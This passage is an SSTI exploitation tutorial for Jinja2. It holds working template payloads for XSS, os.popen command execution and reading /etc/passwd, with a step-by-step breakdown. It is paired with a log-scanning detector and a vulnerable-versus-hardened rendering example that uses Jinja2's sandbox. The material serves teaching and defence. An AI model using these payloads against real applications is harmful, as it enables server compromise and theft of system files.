Exploitation
Exploiting the SSTI
SSTI can be exploited in the following ways:
Cross Site Scripting
{{ "<script>alert('XSS')</script>" }}
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('echo \"<script>alert(1)</script>\"').read() }}
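From the defender's side, payloads like the two above leave recognisable traces in request logs: Jinja2 delimiters, dunder attribute names such as __class__ and __mro__, and os.popen. The following is an added example, not code from the original page: a small scanner that runs over Common Log Format lines and flags parameter values containing those markers. The log lines, IP addresses and the /greet?name= endpoint are constructed for the example.

```python
import re
from urllib.parse import parse_qs

# Constructed sample access-log lines (Common Log Format). The IPs and the
# /greet?name= endpoint are made up for this example.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /greet?name=alice HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /greet?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 498
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /greet?name=%7B%7B%27%27.__class__.__mro__%7D%7D HTTP/1.1" 200 640
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /static/app.js HTTP/1.1" 200 9120
"""

# Common Log Format: ip ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Markers taken from the payloads shown on this page, plus the {{7*7}}
# arithmetic canary that usually precedes them. Order matters: it is the
# order in which marker names are reported.
MARKERS = {
    "jinja_expression": re.compile(r"\{\{.*?\}\}|\{%.*?%\}"),
    "dunder_introspection": re.compile(r"__(?:class|mro|subclasses|globals|init)__"),
    "os_popen": re.compile(r"\bpopen\b"),
    "template_reference": re.compile(r"_TemplateReference__context"),
}


def find_ssti_markers(value: str) -> list:
    """Return the names of all markers present in one decoded parameter value."""
    return [name for name, rx in MARKERS.items() if rx.search(value)]


def scan_access_log(log_text: str) -> list:
    """Parse each log line, URL-decode its query string and report every
    parameter value that carries at least one SSTI marker."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or "?" not in m.group("target"):
            continue
        query = m.group("target").split("?", 1)[1]
        # parse_qs percent-decodes values, so %7B%7B becomes {{ before matching
        for param, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                hits = find_ssti_markers(value)
                if hits:
                    findings.append({
                        "ip": m.group("ip"),
                        "timestamp": m.group("ts"),
                        "param": param,
                        "value": value,
                        "markers": hits,
                    })
    return findings


if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(f'{finding["ip"]} {finding["param"]}={finding["value"]!r} -> {finding["markers"]}')
```

Two hits are reported for 10.0.0.7: the arithmetic canary (jinja_expression only) and the introspection probe (jinja_expression plus dunder_introspection). The delimiter marker alone is noisy, since {{ }} also appears in legitimate client-side template syntax, so treat a dunder or popen hit as the higher-confidence signal and the canary as context.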
Remote Code Execution
In this example we focus on exploiting SSTI to gain code execution in the Jinja2 templating engine (Python).
One payload that can yield code execution is shown below:
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
It looks a little complicated, but everything should become clear after a quick explanation of the code above.
'' # creates the empty string variable
.__class__ # returns the class that the string belongs in (<class 'str'>)
Once the class is returned, the payload uses the MRO attribute (Method Resolution Order), which lists the classes Python searches for base classes during method resolution (related to class inheritance).
.__mro__ # listing the classes
.__mro__[2]
# accessing the class at the top of the hierarchy to find as many
# useful classes as we can
# in our case it is <class 'object'>
When we have a useful class that we can take advantage of, we can proceed to choosing the useful subclasses:
.__subclasses__() # lists the classes that inherit from the chosen class (in our case: <class 'object'>)
.__subclasses__()[40]
# in our case it is <class 'wrapper_descriptor'>
# which includes the <type 'file'> function, which can be used to read files on the system
Running the useful function, which results in reading the /etc/passwd file:
('/etc/passwd').read()
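The walk-through above is the attacker's view; what makes it possible is an application that splices user input into the template source instead of passing it as render context. The following is an added example, not code from the original page, showing that vulnerable pattern next to the hardened one, plus Jinja2's SandboxedEnvironment as a second layer. It assumes Jinja2 is installed (pip install jinja2) and uses a shortened probe, `{{ ''.__class__.__mro__ }}`, constructed from the first two steps of the payload. Note that the payload's `__mro__[2]` and subclass index 40 are Python 2 values (str's MRO there is str, basestring, object); on Python 3 the tuple has only two entries and subclass indices vary with the interpreter and loaded modules, so a sandbox should not rely on any particular index being harmless.

```python
from jinja2 import Environment
from jinja2.exceptions import SecurityError
from jinja2.sandbox import SandboxedEnvironment

# Constructed probes: the arithmetic canary a tester sends first, and the
# opening steps of the class-hierarchy walk explained above.
ARITHMETIC_PROBE = "{{ 7*7 }}"
INTROSPECTION_PROBE = "{{ ''.__class__.__mro__ }}"
XSS_PROBE = "<script>alert(1)</script>"


def vulnerable_render(user_input: str) -> str:
    """Vulnerable: user input becomes part of the template *source*, so any
    Jinja2 syntax in it is evaluated by the engine."""
    env = Environment()
    return env.from_string("Hello " + user_input).render()


def hardened_render(user_input: str) -> str:
    """Fixed: the template source is a constant and the user value is passed
    as render context, so it is data, never code. Autoescaping also neutralises
    the XSS variant from the first section of this page."""
    env = Environment(autoescape=True)
    return env.from_string("Hello {{ name }}").render(name=user_input)


def sandboxed_render(template_source: str) -> str:
    """Defence in depth for the rare case where templates must be
    user-supplied: SandboxedEnvironment refuses access to attributes whose
    names start with an underscore (e.g. __class__, __mro__) and raises
    SecurityError when the template tries to go further with them."""
    env = SandboxedEnvironment()
    return env.from_string(template_source).render()


def sandbox_blocks(template_source: str) -> bool:
    """True if the sandbox rejects the template with SecurityError."""
    try:
        sandboxed_render(template_source)
    except SecurityError:
        return True
    return False


if __name__ == "__main__":
    print(vulnerable_render(ARITHMETIC_PROBE))      # Hello 49
    print(vulnerable_render(INTROSPECTION_PROBE))   # Hello (<class 'str'>, <class 'object'>)
    print(hardened_render(ARITHMETIC_PROBE))        # Hello {{ 7*7 }}
    print(hardened_render(XSS_PROBE))               # Hello &lt;script&gt;alert(1)&lt;/script&gt;
    print(sandbox_blocks(INTROSPECTION_PROBE))      # True
    print(sandbox_blocks(ARITHMETIC_PROBE))         # False
```

The last line is the caveat worth remembering: the sandbox still evaluates templates, so `{{ 7*7 }}` renders as 49 inside it. It limits what an injected template can reach; it does not stop injection. Only the hardened pattern, a fixed template with user data passed as context, removes the injection itself.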